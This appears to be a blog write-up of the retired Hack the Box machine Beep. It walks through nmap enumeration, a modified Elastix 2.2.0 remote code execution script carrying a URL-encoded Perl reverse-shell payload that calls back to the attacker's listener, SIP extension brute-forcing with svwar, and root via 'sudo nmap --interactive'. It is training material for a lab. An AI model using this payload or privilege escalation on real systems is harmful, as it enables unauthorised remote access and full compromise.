Hack the Box Writeup - Beep

My writeup of how to compromise the retired Hack the Box machine, Beep.

Hack the Box Writeup - Beep

My writeup of how to compromise the retired Hack the Box machine, Beep.

Note: You can find my previous guide to Shocker here.

Enumeration

As always we start with our initial enumeration.

$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.7

Lots of ports open on this box including ssh, http and https, smtp, and pop.

Browsing to port 80 redirects us straight to 443 and shows us a login page for Elastix which is a VOIP PBS system.

A quick search on Exploit DB shows that there is a remote code execution vulnerability for Elastix 2.2.0, so lets give that a whirl.

Exploitation

https://www.exploit-db.com/exploits/18650/

We download the script from exploit-db and take a closer look at it. We need to edit it slightly to put in the targets IP and our own IP along with which port we are going to be listening on. Start up netcat and then run the script ...

ssl_error

Uh oh. We get an SSL error. We need to modify the python code a little to make it ignore certificate errors. We can change the script over to the following:

import urllib
import ssl

rhost="10.10.10.7"
lhost="10.10.14.15"
lport=443
extension="1000"

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# Reverse shell payload

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url, context=ctx)

OK, now the script runs without any errors but we don't get a shell back. The likelihood is that the phone extension the script is looking for doesn't exist.

So we need to use another tool to locate a valid SIP extension, SIP Vicious. We utilise the War Dialling tool, svwar.

$ svwar -m INVITE -e100-300 10.10.10.7

sip_vicious

So now we can modify our script again and change the extension over to 233. Running it now gives us our shell, and access to the first flag.

shell-2

Privilege Escalation

Reading the comments on the bottom of the exploit also tells us an incredibly easy way to get root. Simply enter the following into your shell.

> sudo nmap --interactive
> !sh

root_shell

And done; a root shell and access to the final flag.

There are at least 3 other ways of getting shells on this box. I leave it to you as an exercise to find them.